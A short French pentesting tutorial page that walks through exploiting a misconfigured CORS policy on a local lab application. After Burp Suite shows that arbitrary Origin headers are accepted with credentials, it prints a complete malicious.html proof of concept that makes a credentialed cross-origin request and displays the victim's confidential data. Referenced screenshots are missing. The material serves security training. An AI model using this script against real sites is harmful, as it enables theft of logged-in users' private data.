CORS - Origin - Pentesting Web

Toutes ces informations se trouvent sur le site web :

Nous les interceptons avec Burpsuite et constatons que deux champs "Access control credentials" et "origin" sont mal configurés dans la réponse :

Nous ajoutons un nouveau champ origin dans la requête avec le lien d'une page web exemple "google.com" et constatons qu'il est accepté :

Nous créons un fichier web malicious.html qui exploite la vulnérabilité avec les champs origin et credentials :

<script>
   var req = new XMLHttpRequest();
   req.onload = reqListener;
   req.open('GET', 'http://localhost:5000/confidential', true);
   req.withCredentials = true;
   req.send();
   function reqListener() {
		document.getElementById("stolenInfo").innerHTML = req.responseText;
   }
</script>
<center><h1>You have been hacked, this is the information I have stolen from you</h1></center>

<p id="stolenInfo"></p>

Avec Python, nous créons un serveur web :

Nous accédons à notre site web et les informations confidentielles ont été transmises à notre site :

Si CORS était correctement configuré, nous aurions reçu l'erreur suivante :

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?

Cross-Origin Resource Sharing (CORS) :